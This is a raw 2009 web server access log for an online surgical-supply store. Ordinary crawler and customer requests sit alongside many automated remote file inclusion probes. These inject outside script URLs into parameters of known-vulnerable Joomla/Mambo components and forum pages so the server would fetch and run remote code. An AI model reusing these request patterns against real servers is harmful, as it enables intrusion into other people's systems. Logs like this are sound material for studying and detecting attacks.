66.249.72.114 - - [13/May/2009:00:12:47 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L001BC44C0821A900F40C05L+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
93.187.232.189 - - [13/May/2009:00:12:51 -0400] "GET /logs/access_log.Q108090400//program/modules/mods_full/shopping_cart/includes/login.php?http://www.ambient-arts.co.uk/us/id.txt??? HTTP/1.1" 404 284 "-" "libwww-perl/5.808"
66.249.72.114 - - [13/May/2009:00:12:57 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L001BC44C07E1A900FC0C05L+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
93.187.232.189 - - [13/May/2009:00:12:59 -0400] "GET /logs/access_log.Q108090400//program/modules/mods_full/shopping_cart/includes/login.php?http://www.ambient-arts.co.uk/us/id.txt??? HTTP/1.1" 404 284 "-" "libwww-perl/5.808"
145.253.245.211 - - [13/May/2009:00:13:02 -0400] "GET /logs/access_log.Q109050700/index.php?option=com_letterman&task=view&id=11&Itemid=12&mosConfig_absolute_path=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.803"
110.45.144.107 - - [13/May/2009:00:13:04 -0400] "GET /logs/access_log.Q109012300%20%20/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.stormtroopers-of-doom.de/laberecke/id.txt??? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
66.249.72.114 - - [13/May/2009:00:13:07 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L001BC44C08C11900F60C05L+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
110.45.144.107 - - [13/May/2009:00:13:15 -0400] "GET /logs/access_log.Q108121900%20%20/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.stormtroopers-of-doom.de/laberecke/id.txt??? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
66.249.72.114 - - [13/May/2009:00:13:17 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L001BC44C09116900FF0C05L+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
145.253.245.211 - - [13/May/2009:00:13:23 -0400] "GET /logs/access_log.Q109050200/index.php?option=com_jpack&task=view&id=11&Itemid=12&mosConfig_absolute_path=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.803"
145.253.245.211 - - [13/May/2009:00:13:24 -0400] "GET /index.php?option=com_jpack&task=view&id=11&Itemid=12&mosConfig_absolute_path=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 207 "-" "libwww-perl/5.803"
115.145.170.177 - - [13/May/2009:00:13:24 -0400] "GET /logs/access_log.Q108111700//?_zb_path=http://ssdnb.net/bbs/vo.txt?? HTTP/1.1" 404 226 "-" "libwww-perl/5.805"
115.145.170.177 - - [13/May/2009:00:13:25 -0400] "GET //?_zb_path=http://ssdnb.net/bbs/vo.txt?? HTTP/1.1" 200 452 "-" "libwww-perl/5.805"
145.253.245.211 - - [13/May/2009:00:13:25 -0400] "GET /logs/index.php?option=com_jpack&task=view&id=11&Itemid=12&mosConfig_absolute_path=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 212 "-" "libwww-perl/5.803"
115.145.170.177 - - [13/May/2009:00:13:25 -0400] "GET /logs//?_zb_path=http://ssdnb.net/bbs/vo.txt?? HTTP/1.1" 200 1155 "-" "libwww-perl/5.805"
85.92.68.111 - - [13/May/2009:00:13:29 -0400] "GET /logs/access_log.Q108111500//forum/?sourcedir=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
209.59.12.99 - - [13/May/2009:00:13:35 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
196.40.83.75 - - [13/May/2009:00:13:36 -0400] "GET //forum/errors.php?error=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
196.40.83.75 - - [13/May/2009:00:13:36 -0400] "GET /logs//forum/errors.php?error=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
196.40.83.75 - - [13/May/2009:00:13:36 -0400] "GET /logs/access_log.Q108061900//forum/errors.php?error=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
196.40.83.75 - - [13/May/2009:00:13:36 -0400] "GET /logs/access_log.Q108090500//forum/errors.php?error=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
202.71.102.239 - - [13/May/2009:00:13:40 -0400] "GET /logs/access_log.Q108100100/errors.php?error=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
202.71.102.239 - - [13/May/2009:00:13:40 -0400] "GET /logs/errors.php?error=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
202.71.102.239 - - [13/May/2009:00:13:40 -0400] "GET /errors.php?error=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
202.71.102.239 - - [13/May/2009:00:13:40 -0400] "GET /logs/access_log.Q108111600/errors.php?error=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
69.93.90.162 - - [13/May/2009:00:13:47 -0400] "GET //forum/errors.php?error=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
69.93.90.162 - - [13/May/2009:00:13:47 -0400] "GET /logs//forum/errors.php?error=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
69.93.90.162 - - [13/May/2009:00:13:47 -0400] "GET /logs/access_log.Q108061900//forum/errors.php?error=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
69.93.90.162 - - [13/May/2009:00:13:47 -0400] "GET /logs/access_log.Q108090500//forum/errors.php?error=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
145.253.245.211 - - [13/May/2009:00:13:51 -0400] "GET /logs/error_log.Q108101600/index.php?option=com_akocomment&task=view&id=11&Itemid=12&mosConfig_absolute_path=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.803"
66.11.230.61 - - [13/May/2009:00:13:53 -0400] "GET //forum/errors.php?error=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
66.11.230.61 - - [13/May/2009:00:13:53 -0400] "GET /logs//forum/errors.php?error=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
66.11.230.61 - - [13/May/2009:00:13:53 -0400] "GET /logs/access_log.Q108090500//forum/errors.php?error=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
66.11.230.61 - - [13/May/2009:00:13:53 -0400] "GET /logs/access_log.Q108061900//forum/errors.php?error=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
196.40.83.75 - - [13/May/2009:00:14:08 -0400] "GET /logs/access_log.Q108090500%20%20//forum/errors.php?error=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
217.18.76.16 - - [13/May/2009:00:14:11 -0400] "GET /logs/access_log.Q108110900/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 285 "-" "libwww-perl/5.805"
217.18.76.16 - - [13/May/2009:00:14:11 -0400] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 258 "-" "libwww-perl/5.805"
217.18.76.16 - - [13/May/2009:00:14:11 -0400] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 263 "-" "libwww-perl/5.805"
221.139.1.251 - - [13/May/2009:00:14:13 -0400] "GET /logs//forum/errors.php?error=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
221.139.1.251 - - [13/May/2009:00:14:13 -0400] "GET /logs/access_log.Q108061900//forum/errors.php?error=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
221.139.1.251 - - [13/May/2009:00:14:13 -0400] "GET //forum/errors.php?error=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
221.139.1.251 - - [13/May/2009:00:14:13 -0400] "GET /logs/access_log.Q108090500//forum/errors.php?error=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
69.93.90.162 - - [13/May/2009:00:14:32 -0400] "GET /logs/access_log.Q108090500%20%20//forum/errors.php?error=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
196.40.83.75 - - [13/May/2009:00:14:34 -0400] "GET /logs/access_log.Q108111500%20%20//forum/errors.php?error=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
69.93.90.162 - - [13/May/2009:00:14:55 -0400] "GET /logs/access_log.Q108111500%20%20//forum/errors.php?error=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
72.30.79.49 - - [13/May/2009:00:14:56 -0400] "GET /logs/error_log.Q108102300 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
85.92.68.111 - - [13/May/2009:00:15:01 -0400] "GET //forum/errors.php?error=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
85.92.68.111 - - [13/May/2009:00:15:01 -0400] "GET /logs/access_log.Q108090500%20%20//forum/errors.php?error=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
85.92.68.111 - - [13/May/2009:00:15:01 -0400] "GET /logs//forum/errors.php?error=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
221.139.1.251 - - [13/May/2009:00:15:05 -0400] "GET /logs/access_log.Q108090500%20%20//forum/errors.php?error=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
145.253.245.211 - - [13/May/2009:00:15:06 -0400] "GET /logs/access_log.Q108053100/index.php?option=com_swmenufree&task=view&id=1&Itemid=10&mosConfig_absolute_path=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.803"
221.139.1.251 - - [13/May/2009:00:15:17 -0400] "GET /logs/access_log.Q108062600%20%20//forum/errors.php?error=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
66.11.230.61 - - [13/May/2009:00:15:28 -0400] "GET /logs/access_log.Q108090500%20%20//forum/errors.php?error=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
66.11.230.61 - - [13/May/2009:00:15:32 -0400] "GET /logs/access_log.Q108111500%20%20//forum/errors.php?error=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
66.231.111.68 - - [13/May/2009:00:15:45 -0400] "GET /CGI-BIN/LANSAWEB?PROCFUN+WORDPR01+WEBFUNC+M37+FUNCPARMS+STD_DESC(A0300):62784 HTTP/1.1" 200 76103 "http://www.towniecentral.com/MessageBoard/thread.aspx?a=11&s=2&f=123&t=110569&g=1" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; FunWebProducts; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
66.231.111.68 - - [13/May/2009:00:15:46 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 200 984 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+WORDPR01+WEBFUNC+M37+FUNCPARMS+STD_DESC(A0300):62784" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; FunWebProducts; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
66.231.111.68 - - [13/May/2009:00:15:46 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 200 1970 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+WORDPR01+WEBFUNC+M37+FUNCPARMS+STD_DESC(A0300):62784" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; FunWebProducts; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
66.231.111.68 - - [13/May/2009:00:15:46 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 200 1531 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+WORDPR01+WEBFUNC+M37+FUNCPARMS+STD_DESC(A0300):62784" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; FunWebProducts; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
66.231.111.68 - - [13/May/2009:00:15:46 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 200 1729 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+WORDPR01+WEBFUNC+M37+FUNCPARMS+STD_DESC(A0300):62784" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; FunWebProducts; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
66.231.111.68 - - [13/May/2009:00:15:46 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 200 1768 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+WORDPR01+WEBFUNC+M37+FUNCPARMS+STD_DESC(A0300):62784" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; FunWebProducts; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
66.231.111.68 - - [13/May/2009:00:15:46 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 200 5036 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+WORDPR01+WEBFUNC+M37+FUNCPARMS+STD_DESC(A0300):62784" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; FunWebProducts; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
66.231.111.68 - - [13/May/2009:00:15:47 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 200 764 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+WORDPR01+WEBFUNC+M37+FUNCPARMS+STD_DESC(A0300):62784" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; FunWebProducts; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
66.231.111.68 - - [13/May/2009:00:15:47 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 200 1459 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+WORDPR01+WEBFUNC+M37+FUNCPARMS+STD_DESC(A0300):62784" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; FunWebProducts; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
66.231.111.68 - - [13/May/2009:00:15:47 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 200 1160 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+WORDPR01+WEBFUNC+M37+FUNCPARMS+STD_DESC(A0300):62784" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; FunWebProducts; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
66.231.111.68 - - [13/May/2009:00:15:47 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 200 1250 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+WORDPR01+WEBFUNC+M37+FUNCPARMS+STD_DESC(A0300):62784" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; FunWebProducts; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
66.231.111.68 - - [13/May/2009:00:15:47 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 200 1367 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+WORDPR01+WEBFUNC+M37+FUNCPARMS+STD_DESC(A0300):62784" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; FunWebProducts; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
66.231.111.68 - - [13/May/2009:00:15:47 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 200 1235 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+WORDPR01+WEBFUNC+M37+FUNCPARMS+STD_DESC(A0300):62784" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; FunWebProducts; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
66.231.111.68 - - [13/May/2009:00:15:47 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 200 2237 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+WORDPR01+WEBFUNC+M37+FUNCPARMS+STD_DESC(A0300):62784" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; FunWebProducts; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
66.231.111.68 - - [13/May/2009:00:15:47 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+WORDPR01+WEBFUNC+M37+FUNCPARMS+STD_DESC(A0300):62784" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; FunWebProducts; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
66.231.111.68 - - [13/May/2009:00:15:47 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+WORDPR01+WEBFUNC+M37+FUNCPARMS+STD_DESC(A0300):62784" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; FunWebProducts; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
66.231.111.68 - - [13/May/2009:00:15:48 -0400] "GET /images/blend.jpg HTTP/1.1" 200 405 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+WORDPR01+WEBFUNC+M37+FUNCPARMS+STD_DESC(A0300):62784" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; FunWebProducts; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
66.231.111.68 - - [13/May/2009:00:15:48 -0400] "GET /images/cat_dot.gif HTTP/1.1" 200 45 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+WORDPR01+WEBFUNC+M37+FUNCPARMS+STD_DESC(A0300):62784" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; FunWebProducts; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
66.231.111.68 - - [13/May/2009:00:15:48 -0400] "GET /images/cat_link.gif HTTP/1.1" 200 46 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+WORDPR01+WEBFUNC+M37+FUNCPARMS+STD_DESC(A0300):62784" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; FunWebProducts; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
66.231.111.68 - - [13/May/2009:00:15:48 -0400] "GET /images/cat_expand.gif HTTP/1.1" 200 79 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+WORDPR01+WEBFUNC+M37+FUNCPARMS+STD_DESC(A0300):62784" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; FunWebProducts; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
66.231.111.68 - - [13/May/2009:00:15:48 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; FunWebProducts; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
66.231.111.68 - - [13/May/2009:00:15:48 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 200 1296 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+WORDPR01+WEBFUNC+M37+FUNCPARMS+STD_DESC(A0300):62784" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; FunWebProducts; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
66.231.111.68 - - [13/May/2009:00:15:48 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 200 1473 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+WORDPR01+WEBFUNC+M37+FUNCPARMS+STD_DESC(A0300):62784" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; FunWebProducts; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
66.231.111.68 - - [13/May/2009:00:15:48 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 200 1396 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+WORDPR01+WEBFUNC+M37+FUNCPARMS+STD_DESC(A0300):62784" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; FunWebProducts; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
66.231.111.68 - - [13/May/2009:00:15:48 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 200 1354 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+WORDPR01+WEBFUNC+M37+FUNCPARMS+STD_DESC(A0300):62784" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; FunWebProducts; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
66.231.111.68 - - [13/May/2009:00:15:49 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 200 1392 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+WORDPR01+WEBFUNC+M37+FUNCPARMS+STD_DESC(A0300):62784" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; FunWebProducts; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
66.231.111.68 - - [13/May/2009:00:15:49 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 200 1156 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+WORDPR01+WEBFUNC+M37+FUNCPARMS+STD_DESC(A0300):62784" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; FunWebProducts; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
66.231.111.68 - - [13/May/2009:00:15:49 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 200 1097 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+WORDPR01+WEBFUNC+M37+FUNCPARMS+STD_DESC(A0300):62784" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; FunWebProducts; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
66.231.111.68 - - [13/May/2009:00:15:49 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 200 1089 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+WORDPR01+WEBFUNC+M37+FUNCPARMS+STD_DESC(A0300):62784" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; FunWebProducts; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
66.231.111.68 - - [13/May/2009:00:15:49 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 200 1195 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+WORDPR01+WEBFUNC+M37+FUNCPARMS+STD_DESC(A0300):62784" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; FunWebProducts; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
66.231.111.68 - - [13/May/2009:00:15:49 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 200 1110 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+WORDPR01+WEBFUNC+M37+FUNCPARMS+STD_DESC(A0300):62784" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; FunWebProducts; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
69.65.95.28 - - [13/May/2009:00:15:57 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10"
69.65.95.28 - - [13/May/2009:00:15:57 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10"
69.65.95.28 - - [13/May/2009:00:15:59 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10"
69.65.95.28 - - [13/May/2009:00:15:59 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10"
145.253.245.211 - - [13/May/2009:00:16:02 -0400] "GET /logs/access_log.Q108100500/index.php?option=com_jpack&task=view&id=11&Itemid=12&mosConfig_absolute_path=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.803"
85.92.68.111 - - [13/May/2009:00:16:02 -0400] "GET /logs/access_log.Q108061900//forum/errors.php?error=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
85.92.68.111 - - [13/May/2009:00:16:02 -0400] "GET /logs/access_log.Q108090500//forum/errors.php?error=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
66.231.111.68 - - [13/May/2009:00:16:17 -0400] "GET /images/cat_collapse.gif HTTP/1.1" 200 76 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+WORDPR01+WEBFUNC+M37+FUNCPARMS+STD_DESC(A0300):62784" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; FunWebProducts; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
66.231.111.68 - - [13/May/2009:00:16:19 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L001BEE4A0D415900168C06K+M37+ENG HTTP/1.1" 200 69450 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+WORDPR01+WEBFUNC+M37+FUNCPARMS+STD_DESC(A0300):62784" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; FunWebProducts; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
66.231.111.68 - - [13/May/2009:00:16:20 -0400] "GET /images/pf-a.gif HTTP/1.1" 200 798 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L001BEE4A0D415900168C06K+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; FunWebProducts; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
